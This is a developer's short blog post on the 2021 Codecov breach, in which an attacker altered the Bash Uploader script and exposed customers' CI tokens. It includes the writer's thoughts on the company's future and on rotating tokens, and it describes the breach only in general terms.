What is Codecov?
Is a tool that generates a report about your source code test coverage metrics.
Codecov Security Breach:
Last week they had a security breach, a docker container security issue. The attacker gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify their Bash Uploader script. Their investigation shows that it started on January 31, 2021, and was disclosed on April 15, 2021. Codecov supports thousands of customers, many private companies, and U.S. government agencies.
What it means:
Developers security best practices rule number one is: don’t add API tokens into GitHub. Inject the API tokens during CI (Continuous Integration) process to secure the tokens. What if your CI gets breach? That’s what happened with the Codecov security breach, the CI processes of many companies were breached.
If you use Codecov for test code coverage metrics, there is a possibility that the attacker made a copy of your codebase “scary”. Developers trusted a third party company “Codecov” to get their test metrics and now thanks to Codecov an attacker could possibly compromised companies code bases.
Future of CodeCov company?:
- Are they getting sued?
- Are they going to disappear soon?
Future of CodeCov users?:
- Are they creating an in-house solution?
- Are they removing Codecov?
- Or don’t collect test metrics?
In many companies security, it’s only important when the company gets hacked. I believe mostly because having a security team it’s expensive. What happens when your App source code gets compromised?
Maybe it’s time for a new test code coverage metrics solution from Google.
Because of the breach, many companies had to rotate tokens used on their CI processes. Fun fact: don’t trust free third-party tools. Last week my task was to update tokens for Android Bitrise continuous integration configuration. Hopefully, Google releases a solution for test code coverage metrics. I wonder how Google measures its testing metrics?
Thanks for reading. Let me know if you have any questions.
Bash Uploader Security Update - Codecov
Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to…
Codecov hackers breached hundreds of restricted customer sites: sources
SAN FRANCISCO (Reuters) - Hackers who tampered with a software development tool from a company called Codecov used that…